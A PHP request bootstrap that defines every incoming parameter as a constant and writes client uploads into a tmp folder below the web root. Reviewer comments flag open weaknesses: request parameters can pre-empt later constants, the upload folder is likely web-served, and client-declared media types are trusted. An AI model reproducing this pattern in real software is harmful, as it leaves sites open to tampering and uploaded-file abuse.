<?php
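/**
 * Request-parameter bootstrap: turns every incoming parameter into an
 * upper-cased PHP constant and stores uploaded files under
 * SITEROOT_DIR/www/api/tmp/, collecting the stored paths in $files.
 *
 * Input styles, checked in this order:
 *   1. JSON body sent with Content-Type "application/json;charset=utf-8":
 *      a list of {name, value} entries. Entries named "upload"/"uploadimg"
 *      carry a base64 data URI that is written to a server-chosen file name.
 *   2. $_SERVER['QUERY_STRING'] (optionally with multipart $_FILES).
 *   3. $_POST (optionally with multipart $_FILES).
 * If none is present a JSON error is printed and the script stops.
 *
 * Security notes for maintainers:
 *   - Everything handled here is client-controlled and reaches this code
 *     before any authentication visible in this file.
 *   - NOTE(review): the upload directory sits below "www", so it is presumably
 *     served by the web server; confirm that script execution is disabled
 *     there (or move it outside the document root). The extension allowlist
 *     below only checks the final extension and does not replace that.
 *   - NOTE(review): constant names come from the request. Any constant the
 *     application defines *after* this file runs can be pre-empted by a
 *     request parameter of the same name; a dedicated prefix or an allowlist
 *     of expected parameter names would close that gap.
 */

if (!function_exists('api_params_fail')) {
    /**
     * Prints the JSON error envelope used by this file and stops the request.
     *
     * @param string $message Text placed in the "message" field.
     */
    function api_params_fail($message) {
        header('Content-Type: application/json');
        $data = array(
            "message" => $message,
            "status" => false
        );
        print( json_encode($data) );
        die();
    }
}

if (!function_exists('api_params_define')) {
    /**
     * Defines a request parameter as an upper-cased constant.
     *
     * Names that are not valid constant identifiers, and names that are
     * already defined, are ignored instead of raising a notice.
     *
     * @param mixed $name  Parameter name from the request.
     * @param mixed $value Parameter value, stored as given.
     * @return bool True when the constant was defined.
     */
    function api_params_define($name, $value) {
        if (!is_string($name) && !is_int($name)) {
            return false;
        }
        $key = strtoupper((string) $name);
        if (!preg_match('/^[A-Z_][A-Z0-9_]*$/', $key) || defined($key)) {
            return false;
        }
        return define($key, $value);
    }
}

if (!function_exists('api_params_upload_name')) {
    /**
     * Maps the media type declared in a data URI to the server-side file name.
     *
     * The first matching entry wins, in the order listed. The type is only
     * what the client declared; the file content is not inspected.
     *
     * NOTE(review): image names are unique per second only and the other
     * names are fixed, so uploads arriving close together overwrite each other.
     *
     * @param string $type Leading part of the data URI, e.g. "data:image/png".
     * @return string|null File name inside the upload directory, or null when
     *                     the declared type is not supported.
     */
    function api_params_upload_name($type) {
        $imageExt = array('jpeg' => 'jpg', 'png' => 'png', 'gif' => 'gif');
        foreach ($imageExt as $needle => $ext) {
            if (stripos($type, $needle) !== false) {
                return time() . '_' . 'temp.' . $ext;
            }
        }
        $fixedNames = array(
            'csv'       => 'file.csv',
            'flash'     => 'video.flv',
            'quicktime' => 'video.mov',
            'avi'       => 'video.avi',
            'mpeg'      => 'video.mp4',
            'mp4'       => 'video.mp4',
            'asf'       => 'video.wmv',
            'flc'       => 'video.flc',
            'ogg'       => 'video.ogg',
        );
        foreach ($fixedNames as $needle => $name) {
            if (stripos($type, $needle) !== false) {
                return $name;
            }
        }
        return null;
    }
}

if (!function_exists('api_params_store_uploads')) {
    /**
     * Moves every multipart upload into $uploaddir and returns the stored paths.
     *
     * The client-supplied name is reduced to its base name and its final
     * extension must be on the allowlist; otherwise the request is rejected
     * with the same JSON error as a failed move.
     *
     * @param string $uploaddir Target directory, with trailing slash.
     * @return array Paths of the files actually written.
     */
    function api_params_store_uploads($uploaddir) {
        // Mirrors the file types the JSON upload path can produce ("jpeg" added
        // as the common alternative spelling of "jpg"). Extend deliberately if
        // other types are legitimately uploaded.
        $allowedExt = array('jpg', 'jpeg', 'png', 'gif', 'csv', 'flv', 'mov',
                            'avi', 'mp4', 'wmv', 'flc', 'ogg');
        $stored = array();
        foreach ($_FILES as $file) {
            $name = (isset($file['name']) && is_string($file['name'])) ? basename($file['name']) : '';
            $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
            $accepted = $name !== ''
                && in_array($ext, $allowedExt, true)
                && isset($file['tmp_name']) && is_string($file['tmp_name'])
                && move_uploaded_file($file['tmp_name'], $uploaddir . $name);
            if (!$accepted) {
                // Keep the filesystem path in the server log only; echoing it
                // to the client discloses the server's directory layout.
                error_log('Upload rejected or not stored in ' . $uploaddir);
                api_params_fail("File non caricato! Errore! ");
            }
            // Record the path that was really written (base name only).
            $stored[] = $uploaddir . $name;
        }
        return $stored;
    }
}

// Header names are case-insensitive, so do not rely on the exact spelling
// "Content-Type"; normalise the value by dropping whitespace and lower-casing.
$jsonRequest = '';
foreach (getallheaders() as $headerName => $headerValue) {
    if (strcasecmp($headerName, 'Content-Type') === 0) {
        $jsonRequest = strtolower(preg_replace('/\s+/', '', $headerValue));
        break;
    }
}

if ($jsonRequest == "application/json;charset=utf-8") {
    $json = json_decode(file_get_contents('php://input'));
    $files = array();
    // A body that is not a JSON list/object yields no parameters at all.
    $entries = (is_array($json) || is_object($json)) ? $json : array();
    foreach ($entries as $params) {
        if (!is_object($params)) {
            continue;
        }
        $params = get_object_vars($params);
        if (!array_key_exists("value", $params) || !isset($params["name"])) {
            continue;
        }
        if ($params["name"] === "upload" || $params["name"] === "uploadimg") {
            // Expected shape: "data:<type>;base64,<payload>".
            $raw = $params['value'];
            $head = is_string($raw) ? explode(';', $raw) : array();
            $tail = count($head) >= 2 ? explode(',', $head[1]) : array();
            if (count($tail) < 2) {
                continue; // malformed data URI: nothing to store
            }
            $type = $head[0];
            $data = base64_decode($tail[1]);
            $targetName = api_params_upload_name($type);
            if ($targetName === null) {
                // Unsupported type: never fall through to a path left over
                // from a previous entry.
                continue;
            }
            $uploaddir = SITEROOT_DIR.'/www/api/tmp/'. $targetName;
            if (file_put_contents($uploaddir, $data) === false) {
                error_log('Upload not stored in ' . $uploaddir);
                api_params_fail("File non caricato! Errore! ");
            }
            $files[] = $uploaddir;
            continue;
        }
        $value = $params['value'];
        // Array values are stored in serialized form on this path.
        api_params_define($params['name'], is_array($value) ? serialize($value) : $value);
    }
} else if (!empty($_SERVER['QUERY_STRING'])) {
    $params = explode("&", $_SERVER['QUERY_STRING']);
    if ($_FILES) {
        $error = false;
        $uploaddir = SITEROOT_DIR.'/www/api/tmp/';
        $files = api_params_store_uploads($uploaddir);
    }
    foreach ($params as $param) {
        // Key: text before the first "="; value: text after the last "=".
        // NOTE(review): values are not URL-decoded and a value containing "="
        // is cut at its last "="; confirm this is what consumers expect.
        $pieces = explode("=", $param);
        api_params_define(reset($pieces), end($pieces));
    }
} else if ($_POST) {
    if ($_FILES) {
        $error = false;
        $uploaddir = SITEROOT_DIR.'/www/api/tmp/';
        $files = api_params_store_uploads($uploaddir);
    }
    $params = $_POST;
    foreach ($params as $k => $v) {
        api_params_define($k, $v);
    }
} else {
    api_params_fail("Nessun Parametro Inviato!");
}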
?>